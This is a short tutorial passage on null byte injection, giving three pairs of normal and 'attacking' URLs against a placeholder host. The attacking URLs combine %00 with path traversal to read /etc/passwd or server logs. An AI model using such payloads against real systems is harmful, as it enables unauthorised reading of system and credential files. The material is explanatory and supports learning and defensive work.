It is also possible to pass the null character in the URL, which creates a vulnerability known as Null Byte Injection. In the URL it is represented by %00. A null byte is donated by \0 in C.

Exploitation:

Normal: http://www.example.host/user.php?file=myprofile.dat

Attacking: http://www.example.host/user.php?file=../../../etc/passwd%00

Exploitation:

Normal: http://www.example.host/mypage.jsp?fn=report.db

Attacking: http://www.example.host/mypage.jsp?fn=serverlogs.txt%00.db

Exploitation:

Normal: http://www.example.host/read.pl?page=userphoto.jpg

Attacking Mode: http://www.example.host/read.pl?page=../../../../etc/passwd%00jpg